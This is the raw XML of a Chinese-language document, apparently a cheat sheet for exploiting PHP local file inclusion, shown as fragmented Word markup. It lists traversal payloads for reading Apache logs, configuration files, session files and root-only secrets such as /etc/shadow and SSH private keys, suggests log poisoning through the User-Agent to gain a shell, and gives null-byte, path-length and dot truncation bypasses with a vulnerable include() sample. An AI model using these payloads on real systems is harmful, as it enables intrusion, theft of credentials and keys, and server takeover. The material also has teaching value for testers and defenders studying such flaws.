    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6801"/>
        </w:tabs>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:ind w:left="416" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:w w:val="99"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>?file=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>/../../../../../../../../var/log/apache/error.log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spacing w:line="361" w:lineRule="exact"/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56"/>
        <w:ind w:left="417" w:right="317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lastRenderedPageBreak/>
        <w:t>（试试把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UA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>设置为“”来使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payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进入日志）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1" w:line="36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获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>目录或者其他配置文件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6801"/>
        </w:tabs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  <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>?file=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>/../../../../../../../../usr/local/apache2/conf/httpd.conf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80020F">
      <w:pPr>
        <w:spacing w:line="361" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="317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</w:rPr>
        <w:t>（更多→</w:t>
      </w:r>
      <w:hyperlink r:id="rId45">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>http://wiki.apache.org/httpd/DistrosDefaultLayout</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"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包含上传的附件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6801"/>
        </w:tabs>
        <w:spacing w:line="361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  <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>?file=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>/attachment/media/xxx.file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pStyle w:val="a3"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="1"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读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>文件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6801"/>
        </w:tabs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  <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>?file=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>/../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7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80020F">
      <w:pPr>
        <w:spacing w:before="1" w:line="237" w:lineRule="auto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</w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>文件一般在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">tmp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>目录下，格式为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> sess</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>_[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>your phpsessid value]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，有时候也有可能在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/lib/php5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>之类的，在此之前建议先读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取配置文件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在某些特定的情况下如果你能够控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的值，也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许你能够获得一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:lang w:eastAsia="zh-CN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pict>
          <v:shape id="_x0000_s9844" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:20.15pt;width:319.25pt;height:198.1pt;z-index:364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/root/.ssh/authorized_keys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/root/.ssh/id_rsa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/root/.ssh/id_rsa.keystore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/root/.ssh/id_rsa.pub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/root/.ssh/known_hosts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/etc/shadow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/root/.bash_history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/root/.mysql_history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/proc/self/fd/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fd[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0-9]* (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文件标识符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)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/proc/mounts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/proc/config.gz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  <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如果拥有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> root </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>权限还可以试试读这些东西：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="32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如果有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> phpinfo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以包含临时文件：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参见</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="361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417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId46">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="微软雅黑"/>
            <w:w w:val="95"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>http://hi.baidu.com/mmnwzsdvpkjovwr/item/3f7ceb39965145e</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:w w:val="95"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ea984284el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有限制的本地文件包含</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6801"/>
        </w:tabs>
        <w:spacing w:line="323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  <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>include(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>"inc/". $_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>GET[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>'file'] . ".htm")</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:spacing w:val="-22"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>&gt;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9"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">%00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>截断：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?file=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>/../../../../../../../../etc/passwd%00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sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> magic_quotes_gpc=off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sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>小于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.3.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-12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有效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)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9"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="363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 xml:space="preserve">%00 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>截断目录遍历：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6784"/>
        </w:tabs>
        <w:spacing w:before="19" w:line="360" w:lineRule="exact"/>
        <w:ind w:left="417" w:right="41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?file=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>/../../../../../../../../var/www/%00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sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> magic_quotes_gpc=off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sz w:val="21"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="11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文件系统，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-16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FreeBSD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w w:val="99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OpenBSD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sz w:val="21"/>
        </w:rPr>
        <w:t>NetBSD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sz w:val="21"/>
        </w:rPr>
        <w:t>Solaris)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路径长度截断：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  <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>?file=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>/../../../../../../../../etc/passwd/././././././.[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…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]/./././././.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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia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版本小于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.2.8(?)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>可以成功，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-45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需要文件名长于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-16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4096</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:w w:val="99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 xml:space="preserve">windows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>需要长于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:spacing w:val="-31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256</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pP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点号截断：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  <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>?file=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D7D7D7"/>
        </w:rPr>
        <w:t>/../../../../../../../../boot.ini/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………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[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…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]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>…………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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia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版本小于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
